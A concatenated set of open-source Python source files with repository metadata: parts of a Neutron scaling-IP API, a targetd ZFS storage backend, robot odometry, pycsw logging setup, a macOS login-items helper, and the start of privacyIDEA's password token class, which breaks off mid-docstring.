fixed_ip = _get_fixed_ip(context, req_port.get('fixed_ip_address'),
port)
port_fixed_ips[port.id] = {"port": port, "fixed_ip": fixed_ip}
scip = _allocate_ip(context, network, None, ip_address, ip_types.SCALING)
_create_flip(context, scip, port_fixed_ips)
return v._make_scaling_ip_dict(scip)
def update_scalingip(context, id, content):
"""Update an existing scaling IP.
:param context: neutron api request context.
:param id: id of the scaling ip
:param content: dictionary with keys indicating fields to update.
valid keys are those that have a value of True for 'allow_put'
as listed in the RESOURCE_ATTRIBUTE_MAP object in
neutron/api/v2/attributes.py.
:returns: Dictionary containing details for the new scaling IP. If values
are declared in the fields parameter, then only those keys will be
present.
"""
LOG.info('update_scalingip %s for tenant %s and body %s' %
(id, context.tenant_id, content))
requested_ports = content.get('ports', [])
flip = _update_flip(context, id, ip_types.SCALING, requested_ports)
return v._make_scaling_ip_dict(flip)
def delete_scalingip(context, id):
"""Deallocate a scaling IP.
:param context: neutron api request context.
:param id: id of the scaling ip
"""
LOG.info('delete_scalingip %s for tenant %s' % (id, context.tenant_id))
_delete_flip(context, id, ip_types.SCALING)
def get_scalingip(context, id, fields=None):
"""Retrieve a scaling IP.
:param context: neutron api request context.
:param id: The UUID of the scaling IP.
:param fields: a list of strings that are valid keys in a
scaling IP dictionary as listed in the RESOURCE_ATTRIBUTE_MAP
object in neutron/api/v2/attributes.py. Only these fields
will be returned.
:returns: Dictionary containing details for the scaling IP. If values
are declared in the fields parameter, then only those keys will be
present.
"""
LOG.info('get_scalingip %s for tenant %s' % (id, context.tenant_id))
filters = {'address_type': ip_types.SCALING, '_deallocated': False}
scaling_ip = db_api.floating_ip_find(context, id=id, scope=db_api.ONE,
**filters)
if not scaling_ip:
raise q_exc.ScalingIpNotFound(id=id)
return v._make_scaling_ip_dict(scaling_ip)
def get_scalingips(context, filters=None, fields=None, sorts=None, limit=None,
marker=None, page_reverse=False):
"""Retrieve a list of scaling ips.
:param context: neutron api request context.
:param filters: a dictionary with keys that are valid keys for
a scaling ip as listed in the RESOURCE_ATTRIBUTE_MAP object
in neutron/api/v2/attributes.py. Values in this dictionary
are an iterable containing values that will be used for an exact
match comparison for that value. Each result returned by this
function will have matched one of the values for each key in
filters.
:param fields: a list of strings that are valid keys in a
scaling IP dictionary as listed in the RESOURCE_ATTRIBUTE_MAP
object in neutron/api/v2/attributes.py. Only these fields
will be returned.
:returns: List of scaling IPs that are accessible to the tenant who
submits the request (as indicated by the tenant id of the context)
as well as any filters.
"""
LOG.info('get_scalingips for tenant %s filters %s fields %s' %
(context.tenant_id, filters, fields))
scaling_ips = _get_ips_by_type(context, ip_types.SCALING,
filters=filters, fields=fields)
return [v._make_scaling_ip_dict(scip) for scip in scaling_ips]
| apache-2.0 | -7,158,888,643,166,104,000 | 39.076672 | 79 | 0.631294 | false | 3.856672 | false | false | false |
open-iscsi/targetd | targetd/backends/zfs.py | 1 | 16228 | # This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Copyright 2012-2013, Andy Grover <[email protected]>
#
# Routines specific to ZFS to export zvols over iscsi
import distutils.spawn
import logging
import re
import subprocess
from time import time, sleep
from targetd.main import TargetdError
pools = []
pools_fs = dict()
zfs_cmd = ""
zfs_enable_copy = False
ALLOWED_DATASET_NAMES = re.compile("^[A-Za-z0-9][A-Za-z0-9_.\-]*$")
class VolInfo(object):
"""
Just to have attributes compatible with LVM info.
"""
uuid = ""
size = 0
def __init__(self, uuid, size):
self.uuid = uuid
self.size = size
def has_pool(pool_name):
"""
This can be used to check if module owns given pool without raising
exception
"""
return pool_name in pools
def has_fs_pool(pool_name):
"""
This can be used to check if module owns given fs_pool without raising
exception
"""
return pool_name in pools_fs
def has_udev_path(udev_path):
try:
pool, dataset = split_udev_path(udev_path)
except (IndexError, ValueError, TypeError):
return False
return True
def split_udev_path(udev_path):
dataset = udev_path.split("/", 2)[2]
for p in pools:
if dataset.startswith(p + "/"):
return p, dataset.replace(p + "/", "", 1)
def pool2dev_name(pool):
"""
Pool name and dev name (equivalent of vg from LVM) are the same in ZFS
"""
return pool
def dev2pool_name(dev):
"""
Pool name and dev name (equivalent of vg from LVM) are the same in ZFS
"""
return dev
def get_so_name(pool, volname):
"""
Using % here, because it's not allowed in zfs dataset names and
/ is not allowed in target's storage object names
"""
return "%s:%s" % (pool.replace("/", "%"), volname)
def so_name2pool_volume(so_name):
pool_name, vol_name = so_name.split(":")
pool_name = pool_name.replace("%", "/")
return pool_name, vol_name
def has_so_name(so_name):
pool_name, vol_name = so_name.split(":")
pool_name = pool_name.replace("%", "/")
return has_pool(pool_name)
def get_dev_path(pool_name, vol_name):
return "/dev/%s/%s" % (pool2dev_name(pool_name), vol_name)
def initialize(config_dict, init_pools):
global pools
global zfs_enable_copy
zfs_enable_copy = zfs_enable_copy or config_dict["zfs_enable_copy"]
check_pools_access(init_pools)
pools = init_pools
def fs_initialize(config_dict, init_pools):
global pools_fs
global zfs_enable_copy
zfs_enable_copy = zfs_enable_copy or config_dict["zfs_enable_copy"]
pools_fs = {fs["mount"]: fs["device"] for fs in init_pools}
check_pools_access(list(pools_fs.values()))
def _check_dataset_name(name):
if not ALLOWED_DATASET_NAMES.match(name):
raise TargetdError(
TargetdError.INVALID_ARGUMENT,
"Invalid dataset name, can only contain alphanumeric characters,"
"underscores, dots and hyphens",
)
def _zfs_find_cmd():
cmd = distutils.spawn.find_executable("zfs") or distutils.spawn.find_executable(
"zfs", "/sbin:/usr/sbin"
)
if cmd is None or not cmd:
raise TargetdError(
TargetdError.INVALID, "zfs_block_pools is set but no zfs command was found"
)
global zfs_cmd
zfs_cmd = cmd
def _zfs_exec_command(args=None):
if args is None:
args = []
for _ in range(3):
proc = subprocess.Popen(
[zfs_cmd] + args, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
(out, err) = proc.communicate()
if proc.returncode != 0:
logging.debug(
"zfs command returned non-zero status: %s, %s. Stderr: %s. Stdout: %s"
% (proc.returncode, args, out, err)
)
# See: https://github.com/openzfs/zfs/issues/1810
if b"dataset is busy" in err:
sleep(1)
logging.debug("Retrying on 'dataset is busy' error ...")
continue
else:
return proc.returncode, out, err
else:
return proc.returncode, out, err
def _zfs_get(datasets, properties, recursive=False, fstype="all"):
result = {}
flags = "-Hp"
if recursive:
flags = "-Hpr"
code, out, err = _zfs_exec_command(
["get", flags, "-t", fstype, ",".join(properties)] + datasets
)
for line in out.strip().split(b"\n"):
fields = str(line, encoding="utf-8").strip().split("\t")
if len(fields) < 2:
continue
if fields[0] in result:
result[fields[0]][fields[1]] = fields[2].strip()
else:
result[fields[0]] = {fields[1]: fields[2].strip()}
return result
def check_pools_access(check_pools):
if any([s.startswith(i + "/") for s in check_pools for i in check_pools]):
raise TargetdError(
TargetdError.INVALID,
"ZFS pools cannot contain both parent and child datasets",
)
if any(":" in p for p in check_pools):
raise TargetdError(TargetdError.INVALID, "Colon in ZFS pools is not supported")
if len(check_pools) == 0:
logging.debug("No ZFS pool defined, skipping ZFS")
return
_zfs_find_cmd()
props = _zfs_get(check_pools, ["type", "name"])
for p in check_pools:
if p not in props or "type" not in props[p]:
raise TargetdError(
TargetdError.INVALID, "ZFS dataset does not exist: %s" % (p,)
)
if props[p]["type"] != "filesystem":
raise TargetdError(
TargetdError.INVALID,
"ZFS dataset must be of 'filesystem' type. %s is %s"
% (p, props[p]["type"]),
)
def block_pools(req):
if not zfs_cmd:
return []
results = []
props = _zfs_get(pools, ["available", "used", "guid"])
for pool in pools:
results.append(
dict(
name=pool,
size=int(props[pool]["available"]) + int(props[pool]["used"]),
free_size=int(props[pool]["available"]),
type="block",
uuid=int(props[pool]["guid"]),
)
)
return results
def volumes(req, pool):
if not zfs_cmd:
return []
allprops = _zfs_get([pool], ["volsize", "guid"], True, "volume")
results = []
for fullname, props in allprops.items():
results.append(
dict(
name=fullname.replace(pool + "/", "", 1),
size=int(props["volsize"]),
uuid=props["guid"],
)
)
return results
def fs_hash():
if not zfs_cmd:
return {}
fs_list = {}
for pool, zfs_pool in pools_fs.items():
allprops = _zfs_get(
[zfs_pool],
["name", "mountpoint", "guid", "used", "available"],
True,
"filesystem",
)
for fullname, props in allprops.items():
if fullname == zfs_pool:
continue
sub_vol = fullname.replace(zfs_pool + "/", "", 1)
key = props["name"]
fs_list[key] = dict(
name=sub_vol,
uuid=props["guid"],
total_space=int(props["used"]) + int(props["available"]),
free_space=int(props["available"]),
pool=pool,
full_path=props["mountpoint"],
)
return fs_list
def vol_info(pool, name):
props = _zfs_get([pool + "/" + name], ["guid", "volsize"], fstype="volume")
if (pool + "/" + name) in props:
props = props[pool + "/" + name]
return VolInfo(props["guid"], int(props["volsize"]))
def fs_info(pool, name):
props = _zfs_get(
[pool + "/" + name], ["guid", "used", "available"], fstype="filesystem"
)
if (pool + "/" + name) in props:
props = props[pool + "/" + name]
return VolInfo(props["guid"], int(props["available"]) + int(props["used"]))
def snap_info(pool, name, snapshot):
props = _zfs_get([pool + "/" + name + "@" + snapshot], ["guid"], fstype="snapshot")
if (pool + "/" + name + "@" + snapshot) in props:
props = props[pool + "/" + name + "@" + snapshot]
return dict(name=pool + "/" + name + "@" + snapshot, uuid=props["guid"])
def create(req, pool, name, size):
_check_dataset_name(name)
code, out, err = _zfs_exec_command(["create", "-V", str(size), pool + "/" + name])
if code != 0:
logging.error(
"Could not create volume %s on pool %s. Code: %s, stderr %s"
% (name, pool, code, err)
)
raise TargetdError(
TargetdError.UNEXPECTED_EXIT_CODE,
"Could not create volume %s on pool %s" % (name, pool),
)
def fs_create(req, pool, name, size):
_check_dataset_name(name)
zfs_pool = pools_fs[pool]
if fs_info(zfs_pool, name) is not None:
raise TargetdError(
TargetdError.EXISTS_FS_NAME, "FS already exists with that name (ZFS)"
)
code, out, err = _zfs_exec_command(["create", zfs_pool + "/" + name])
if code != 0:
logging.error(
"Could not create volume %s on pool %s. Code: %s, stderr %s"
% (name, pool, code, err)
)
raise TargetdError(
TargetdError.UNEXPECTED_EXIT_CODE,
"Could not create volume %s on pool %s" % (name, pool),
)
def destroy(req, pool, name):
_check_dataset_name(name)
# -r will destroy snapshots and children but not dependant clones
code, out, err = _zfs_exec_command(["destroy", "-r", pool + "/" + name])
if code != 0:
if b"volume has dependent clones" in err:
logging.error(
"Volume %s on %s has dependent clones and cannot be destroyed. Stderr: %s"
% (name, pool, err)
)
raise TargetdError(
TargetdError.INVALID_ARGUMENT,
"Volume %s on %s has dependent clones and cannot be destroyed."
% (name, pool),
)
else:
logging.error(
"Could not destroy volume %s on pool %s. Code: %s, stderr %s"
% (name, pool, code, err)
)
raise TargetdError(
TargetdError.UNEXPECTED_EXIT_CODE,
"Could not destroy volume %s on pool %s" % (name, pool),
)
def fs_destroy(req, pool, name):
zfs_pool = pools_fs[pool]
destroy(req, zfs_pool, name)
def copy(req, pool, vol_orig, vol_new, size, timeout=10):
_copy(req, pool, vol_orig, vol_new, size, vol_info)
def _copy(req, pool, vol_orig, vol_new, size, info_fn, snap=None):
if not zfs_enable_copy:
raise TargetdError(
TargetdError.NO_SUPPORT,
"Copy on ZFS disabled. Consult manual before enabling it.",
)
_check_dataset_name(vol_orig)
_check_dataset_name(vol_new)
if info_fn(pool, vol_new) is not None:
raise TargetdError(
TargetdError.NAME_CONFLICT,
"Destination volume %s already exists on pool %s" % (vol_new, pool),
)
if snap is None:
snap = vol_new + str(int(time()))
code, out, err = _zfs_exec_command(
["snapshot", "%s/%s@%s" % (pool, vol_orig, snap)]
)
if code != 0:
raise TargetdError(
TargetdError.UNEXPECTED_EXIT_CODE,
"Could not create snapshot of %s on pool %s" % (vol_orig, pool),
)
args = ["clone"]
if size is not None:
args.extend(["-o", "volsize=%d" % size])
args.extend(["%s/%s@%s" % (pool, vol_orig, snap), "%s/%s" % (pool, vol_new)])
code, out, err = _zfs_exec_command(args)
if code != 0:
# try cleaning up the snapshot if cloning goes wrong
_zfs_exec_command(["destroy", "%s/%s@%s" % (pool, vol_orig, snap)])
raise TargetdError(
TargetdError.UNEXPECTED_EXIT_CODE,
"Could not create clone of %s@%s on pool %s" % (vol_orig, snap, pool),
)
def resize(req, pool, name, size):
args = ["set", "volsize=%d" % size, "%s/%s" % (pool, name)]
code, out, err = _zfs_exec_command(args)
if code != 0:
raise TargetdError(TargetdError.UNEXPECTED_EXIT_CODE, "Failed to resize volume")
def ss(req, pool, name):
snapshots = []
zfs_pool = pools_fs[pool]
# NOTE: Recursive is set to True as the ZFS version on Ubuntu in Travis does not appreciate getting snapshots
# by passing in a non-snapshot name. Somewhere between version 0.7.5 and 0.8.4 this got fixed
allprops = _zfs_get(
[zfs_pool + "/" + name], ["name", "guid", "creation"], True, "snapshot"
)
for fullname, props in allprops.items():
# Filter out any subvolume snapshots (these should not generally exist though
# and indicate an administration issue)
if not fullname.startswith(zfs_pool + "/" + name + "@"):
logging.warning(
"found additional subvolumes with snapshots while trying to list snapshots. Please do not"
" create subvolumes underneath targetd managed subvolumes"
)
continue
time_epoch = int(props["creation"])
st = dict(
name=props["name"].replace((zfs_pool + "/" + name + "@"), "", 1),
uuid=props["guid"],
timestamp=time_epoch,
)
snapshots.append(st)
return snapshots
def fs_snapshot(req, pool, name, dest_ss_name):
_check_dataset_name(name)
_check_dataset_name(dest_ss_name)
zfs_pool = pools_fs[pool]
info = snap_info(zfs_pool, name, dest_ss_name)
if info is not None:
raise TargetdError(
TargetdError.EXISTS_FS_NAME,
"Snapshot {0} already exists on pool {1} for {2}".format(
dest_ss_name, pool, name
),
)
code, out, err = _zfs_exec_command(
["snapshot", "{0}/{1}@{2}".format(zfs_pool, name, dest_ss_name)]
)
if code != 0:
raise TargetdError(
TargetdError.UNEXPECTED_EXIT_CODE, "Could not create snapshot"
)
def fs_snapshot_delete(req, pool, name, ss_name):
_check_dataset_name(name)
_check_dataset_name(ss_name)
zfs_pool = pools_fs[pool]
info = snap_info(zfs_pool, name, ss_name)
if info is None:
return
code, out, err = _zfs_exec_command(
["destroy", "-r", "{0}/{1}@{2}".format(zfs_pool, name, ss_name)]
)
if code != 0:
raise TargetdError(
TargetdError.UNEXPECTED_EXIT_CODE, "Could not destroy snapshot"
)
def fs_clone(req, pool, name, dest_fs_name, snapshot_name=None):
zfs_pool = pools_fs[pool]
if fs_info(zfs_pool, dest_fs_name) is not None:
raise TargetdError(
TargetdError.EXISTS_CLONE_NAME, "FS already exists with that name (ZFS)"
)
_copy(req, zfs_pool, name, dest_fs_name, None, fs_info, snapshot_name)
def fs_pools(req):
results = []
for pool, zfs_pool in pools_fs.items():
allprops = _zfs_get(
[zfs_pool], ["name", "used", "available"], False, "filesystem"
)
if zfs_pool in allprops:
props = allprops[zfs_pool]
results.append(
dict(
name=pool,
size=(int(props["used"]) + int(props["available"])),
free_size=int(props["available"]),
type="fs",
)
)
return results
| gpl-3.0 | -1,474,268,533,459,330,600 | 29.107607 | 113 | 0.561868 | false | 3.557992 | false | false | false |
merose/diff_drive | src/diff_drive/odometry.py | 1 | 2663 | from __future__ import division
from math import pi, sin, cos
from diff_drive.encoder import Encoder
from diff_drive.pose import Pose
class Odometry:
"""Keeps track of the current position and velocity of a
robot using differential drive.
"""
def __init__(self):
self.leftEncoder = Encoder()
self.rightEncoder = Encoder()
self.pose = Pose()
self.lastTime = 0
def setWheelSeparation(self, separation):
self.wheelSeparation = separation
def setTicksPerMeter(self, ticks):
self.ticksPerMeter = ticks
def setEncoderRange(self, low, high):
self.leftEncoder.setRange(low, high)
self.rightEncoder.setRange(low, high)
def setTime(self, newTime):
self.lastTime = newTime
def updateLeftWheel(self, newCount):
self.leftEncoder.update(newCount)
def updateRightWheel(self, newCount):
self.rightEncoder.update(newCount)
def updatePose(self, newTime):
"""Updates the pose based on the accumulated encoder ticks
of the two wheels. See https://chess.eecs.berkeley.edu/eecs149/documentation/differentialDrive.pdf
for details.
"""
leftTravel = self.leftEncoder.getDelta() / self.ticksPerMeter
rightTravel = self.rightEncoder.getDelta() / self.ticksPerMeter
deltaTime = newTime - self.lastTime
deltaTravel = (rightTravel + leftTravel) / 2
deltaTheta = (rightTravel - leftTravel) / self.wheelSeparation
if rightTravel == leftTravel:
deltaX = leftTravel*cos(self.pose.theta)
deltaY = leftTravel*sin(self.pose.theta)
else:
radius = deltaTravel / deltaTheta
# Find the instantaneous center of curvature (ICC).
iccX = self.pose.x - radius*sin(self.pose.theta)
iccY = self.pose.y + radius*cos(self.pose.theta)
deltaX = cos(deltaTheta)*(self.pose.x - iccX) \
- sin(deltaTheta)*(self.pose.y - iccY) \
+ iccX - self.pose.x
deltaY = sin(deltaTheta)*(self.pose.x - iccX) \
+ cos(deltaTheta)*(self.pose.y - iccY) \
+ iccY - self.pose.y
self.pose.x += deltaX
self.pose.y += deltaY
self.pose.theta = (self.pose.theta + deltaTheta) % (2*pi)
self.pose.xVel = deltaTravel / deltaTime if deltaTime > 0 else 0.
self.pose.yVel = 0
self.pose.thetaVel = deltaTheta / deltaTime if deltaTime > 0 else 0.
self.lastTime = newTime
def getPose(self):
return self.pose;
def setPose(self, newPose):
self.pose = newPose
| bsd-3-clause | 5,621,864,774,542,927,000 | 32.708861 | 106 | 0.618475 | false | 3.569705 | false | false | false |
PublicaMundi/pycsw | pycsw/log.py | 1 | 3506 | # -*- coding: iso-8859-15 -*-
# =================================================================
#
# Authors: Tom Kralidis <[email protected]>
#
# Copyright (c) 2011 Tom Kralidis
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# =================================================================
import logging
LOGGER = logging.getLogger(__name__)
MSG_FORMAT = '%(asctime)s] [%(levelname)s] file=%(pathname)s \
line=%(lineno)s module=%(module)s function=%(funcName)s %(message)s'
TIME_FORMAT = '%a, %d %b %Y %H:%M:%S'
LOGLEVELS = {
'CRITICAL': logging.CRITICAL,
'ERROR': logging.ERROR,
'WARNING': logging.WARNING,
'INFO': logging.INFO,
'DEBUG': logging.DEBUG,
'NOTSET': logging.NOTSET,
}
def setup_logger(config=None):
"""Initialize logging facility"""
if config is None:
return None
# Do not proceed if logging has not been set up.
if not (config.has_option('server', 'loglevel') or
config.has_option('server', 'logfile')):
return None
logfile = None
loglevel = 'NOTSET'
if config.has_option('server', 'loglevel'):
loglevel = config.get('server', 'loglevel')
if loglevel not in LOGLEVELS.keys():
raise RuntimeError(
'Invalid server configuration (server.loglevel).')
if not config.has_option('server', 'logfile'):
raise RuntimeError(
'Invalid server configuration (server.loglevel set,\
but server.logfile missing).')
if config.has_option('server', 'logfile'):
if not config.has_option('server', 'loglevel'):
raise RuntimeError(
'Invalid server configuration (server.logfile set,\
but server.loglevel missing).')
logfile = config.get('server', 'logfile')
if loglevel != 'NOTSET' and logfile is None:
raise RuntimeError(
'Invalid server configuration \
(server.loglevel set, but server.logfile is not).')
# Setup logging globally (not only for the pycsw module)
# based on the parameters passed.
logging.basicConfig(level=LOGLEVELS[loglevel],
filename=logfile,
datefmt=TIME_FORMAT,
format=MSG_FORMAT)
LOGGER.info('Logging initialized (level: %s).' % loglevel)
if loglevel == 'DEBUG': # turn on CGI debugging
LOGGER.info('CGI debugging enabled.')
import cgitb
cgitb.enable()
| mit | -4,502,147,059,277,054,000 | 34.06 | 68 | 0.630918 | false | 4.339109 | true | false | false |
pudquick/pyLoginItems | pyLoginItems.py | 1 | 8789 | # /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/Headers/LSSharedFileList.h
# Fun things:
# kLSSharedFileListFavoriteItems
# kLSSharedFileListFavoriteVolumes
# kLSSharedFileListRecentApplicationItems
# kLSSharedFileListRecentDocumentItems
# kLSSharedFileListRecentServerItems
# kLSSharedFileListSessionLoginItems
# kLSSharedFileListGlobalLoginItems - deprecated in 10.9
# Runs in user space, use this with a login script / launchd item / something running as the user
# Example usage:
#
# import pyLoginItems
# >>> pyLoginItems.list_login_items()
# [u'/Applications/Dropbox.app', u'/Applications/iTunes.app/Contents/MacOS/iTunesHelper.app']
#
# pyLoginItems.add_login_item('/Applications/Safari.app', 0)
# pyLoginItems.remove_login_item('/Applications/TextEdit.app')
from platform import mac_ver
from Foundation import NSURL
from LaunchServices import kLSSharedFileListSessionLoginItems, kLSSharedFileListNoUserInteraction
# Need to manually load in 10.11.x+
os_vers = int(mac_ver()[0].split('.')[1])
if os_vers > 10:
from Foundation import NSBundle
import objc
SFL_bundle = NSBundle.bundleWithIdentifier_('com.apple.coreservices.SharedFileList')
functions = [('LSSharedFileListCreate', '^{OpaqueLSSharedFileListRef=}^{__CFAllocator=}^{__CFString=}@'),
('LSSharedFileListCopySnapshot', '^{__CFArray=}^{OpaqueLSSharedFileListRef=}o^I'),
('LSSharedFileListItemCopyDisplayName', '^{__CFString=}^{OpaqueLSSharedFileListItemRef=}'),
('LSSharedFileListItemResolve', 'i^{OpaqueLSSharedFileListItemRef=}Io^^{__CFURL=}o^{FSRef=[80C]}'),
('LSSharedFileListItemMove', 'i^{OpaqueLSSharedFileListRef=}^{OpaqueLSSharedFileListItemRef=}^{OpaqueLSSharedFileListItemRef=}'),
('LSSharedFileListItemRemove', 'i^{OpaqueLSSharedFileListRef=}^{OpaqueLSSharedFileListItemRef=}'),
('LSSharedFileListInsertItemURL', '^{OpaqueLSSharedFileListItemRef=}^{OpaqueLSSharedFileListRef=}^{OpaqueLSSharedFileListItemRef=}^{__CFString=}^{OpaqueIconRef=}^{__CFURL=}^{__CFDictionary=}^{__CFArray=}'),
('kLSSharedFileListItemBeforeFirst', '^{OpaqueLSSharedFileListItemRef=}'),
('kLSSharedFileListItemLast', '^{OpaqueLSSharedFileListItemRef=}'),]
objc.loadBundleFunctions(SFL_bundle, globals(), functions)
else:
from LaunchServices import kLSSharedFileListItemBeforeFirst, kLSSharedFileListItemLast, \
LSSharedFileListCreate, LSSharedFileListCopySnapshot, \
LSSharedFileListItemCopyDisplayName, LSSharedFileListItemResolve, \
LSSharedFileListItemMove, LSSharedFileListItemRemove, \
LSSharedFileListInsertItemURL
def _get_login_items():
# Setup the type of shared list reference we want
list_ref = LSSharedFileListCreate(None, kLSSharedFileListSessionLoginItems, None)
# Get the user's login items - actually returns two values, with the second being a seed value
# indicating when the snapshot was taken (which is safe to ignore here)
login_items,_ = LSSharedFileListCopySnapshot(list_ref, None)
return [list_ref, login_items]
def _get_item_cfurl(an_item, flags=None):
if flags is None:
# Attempt to resolve the items without interacting or mounting
flags = kLSSharedFileListNoUserInteraction + kLSSharedFileListNoUserInteraction
err, a_CFURL, a_FSRef = LSSharedFileListItemResolve(an_item, flags, None, None)
return a_CFURL
def list_login_items():
# Attempt to find the URLs for the items without mounting drives
URLs = []
for an_item in _get_login_items()[1]:
URLs.append(_get_item_cfurl(an_item).path())
return URLs
def remove_login_item(path_to_item):
current_paths = list_login_items()
if path_to_item in current_paths:
list_ref, current_items = _get_login_items()
i = current_paths.index(path_to_item)
target_item = current_items[i]
result = LSSharedFileListItemRemove(list_ref, target_item)
def add_login_item(path_to_item, position=-1):
# position:
# 0..N: Attempt to insert at that index position, with 0 being first
# -1: Insert as last item
# Note:
# If the item is already present in the list, it will get moved to the new location automatically.
list_ref, current_items = _get_login_items()
added_item = NSURL.fileURLWithPath_(path_to_item)
if position == 0:
# Seems to be buggy, will force it below
destination_point = kLSSharedFileListItemBeforeFirst
elif position == -1:
destination_point = kLSSharedFileListItemLast
elif position >= len(current_items):
# At or beyond to the end of the current list
position = -1
destination_point = kLSSharedFileListItemLast
else:
# 1 = after item 0, 2 = after item 1, etc.
destination_point = current_items[position - 1]
# The logic for LSSharedFileListInsertItemURL is generally fine when the item is not in the list
# already (with the exception of kLSSharedFileListItemBeforeFirst which appears to be broken, period)
# However, if the item is already in the list, the logic gets really really screwy.
# Your index calculations are invalidated by OS X because you shift an item, possibly shifting the
# indexes of other items in the list.
# It's easier to just remove it first, then re-add it.
current_paths = list_login_items()
if (len(current_items) == 0) or (position == -1):
# Either there's nothing there or it wants to be last
# Just add the item, it'll be fine
result = LSSharedFileListInsertItemURL(list_ref, destination_point, None, None, added_item, {}, [])
elif (position == 0):
# Special case - kLSSharedFileListItemBeforeFirst appears broken on (at least) 10.9
# Remove if already in the list
if path_to_item in current_paths:
i = current_paths.index(path_to_item)
old_item = current_items[i]
result = LSSharedFileListItemRemove(list_ref, old_item)
# Regenerate list_ref and items
list_ref, current_items = _get_login_items()
if (len(current_items) == 0):
# Simple case if nothing remains in the list
result = LSSharedFileListInsertItemURL(list_ref, destination_point, None, None, added_item, {}, [])
else:
# At least one item remains.
# The fix for the bug is:
# - Add our item after the first ('needs_fixing') item
# - Move the 'needs_fixing' item to the end
# - Move the 'needs_fixing' item after our added item (which is now first)
needs_fixing = _get_item_cfurl(current_items[0])
# Move our item
result = LSSharedFileListInsertItemURL(list_ref, current_items[0], None, None, added_item, {}, [])
if not (result is None):
# Only shift if the first insert worked
# Regenerate list_ref and items
list_ref, current_items = _get_login_items()
# Now move the old item last
result = LSSharedFileListInsertItemURL(list_ref, kLSSharedFileListItemLast, None, None, needs_fixing, {}, [])
# Regenerate list_ref and items
list_ref, current_items = _get_login_items()
# Now move the old item back under the new one
result = LSSharedFileListInsertItemURL(list_ref, current_items[0], None, None, needs_fixing, {}, [])
else:
# We're aiming for an index based on something else in the list.
# Only do something if we're not aiming at ourselves.
insert_after_path = _get_item_cfurl(destination_point).path()
if (insert_after_path != path_to_item):
# Seems to be a different file
if path_to_item in current_paths:
# Remove our object if it's already present
i = current_paths.index(path_to_item)
self_item = current_items[i]
result = LSSharedFileListItemRemove(list_ref, self_item)
# Regenerate list_ref and items
list_ref, current_items = _get_login_items()
# Re-find our original target
current_paths = list_login_items()
i = current_paths.index(insert_after_path)
destination_point = current_items[i]
# Add ourselves after the file
result = LSSharedFileListInsertItemURL(list_ref, destination_point, None, None, added_item, {}, [])
| mit | -3,015,296,332,508,749,000 | 53.590062 | 230 | 0.661281 | false | 3.752775 | false | false | false |
jalr/privacyidea | privacyidea/lib/tokens/passwordtoken.py | 1 | 4231 | # -*- coding: utf-8 -*-
#
# privacyIDEA is a fork of LinOTP
# 2014-12-05 Cornelius Kölbel <[email protected]>
# Migration to flask
#
# May 08, 2014 Cornelius Kölbel
# License: AGPLv3
# contact: http://www.privacyidea.org
#
# Copyright (C) 2010 - 2014 LSE Leading Security Experts GmbH
# License: LSE
# contact: http://www.linotp.org
# http://www.lsexperts.de
# [email protected]
"""
This file contains the definition of the password token class
"""
import logging
from privacyidea.lib.crypto import zerome
from privacyidea.lib.tokenclass import TokenClass
from privacyidea.lib.log import log_with
from privacyidea.lib.decorators import check_token_locked
optional = True
required = False
log = logging.getLogger(__name__)
class PasswordTokenClass(TokenClass):
"""
This Token does use a fixed Password as the OTP value.
In addition, the OTP PIN can be used with this token.
This Token can be used for a scenario like losttoken
"""
class SecretPassword(object):
def __init__(self, secObj):
self.secretObject = secObj
def get_password(self):
return self.secretObject.getKey()
def check_password(self, password):
res = -1
key = self.secretObject.getKey()
if key == password:
res = 0
zerome(key)
del key
return res
def __init__(self, aToken):
TokenClass.__init__(self, aToken)
self.hKeyRequired = True
self.set_type(u"pw")
@staticmethod
def get_class_type():
return "pw"
@staticmethod
def get_class_prefix():
return "PW"
@staticmethod
@log_with(log)
def get_class_info(key=None, ret='all'):
"""
returns a subtree of the token definition
:param key: subsection identifier
:type key: string
:param ret: default return value, if nothing is found
:type ret: user defined
:return: subsection if key exists or user defined
:rtype: dict or scalar
"""
res = {'type': 'pw',
'title': 'Password Token',
'description': ('A token with a fixed password. Can be '
'combined with the OTP PIN. Is used for the '
'lost token scenario.'),
'init': {},
'config': {},
'user': [],
# This tokentype is enrollable in the UI for...
'ui_enroll': [],
'policy': {},
}
# I don't think we need to define the lost token policies here...
if key is not None and key in res:
ret = res.get(key)
else:
if ret == 'all':
ret = res
return ret
def update(self, param):
"""
This method is called during the initialization process.
:param param: parameters from the token init
:type param: dict
:return: None
"""
"""
:param param:
:return:
"""
TokenClass.update(self, param)
self.set_otplen()
@log_with(log)
@check_token_locked
def set_otplen(self, otplen=0):
"""
sets the OTP length to the length of the password
:param otplen: This is ignored in this class
:type otplen: int
:result: None
"""
secretHOtp = self.token.get_otpkey()
sp = PasswordTokenClass.SecretPassword(secretHOtp)
pw_len = len(sp.get_password())
TokenClass.set_otplen(self, pw_len)
return
@log_with(log, log_entry=False)
@check_token_locked
def check_otp(self, anOtpVal, counter=None, window=None, options=None):
"""
This checks the static password
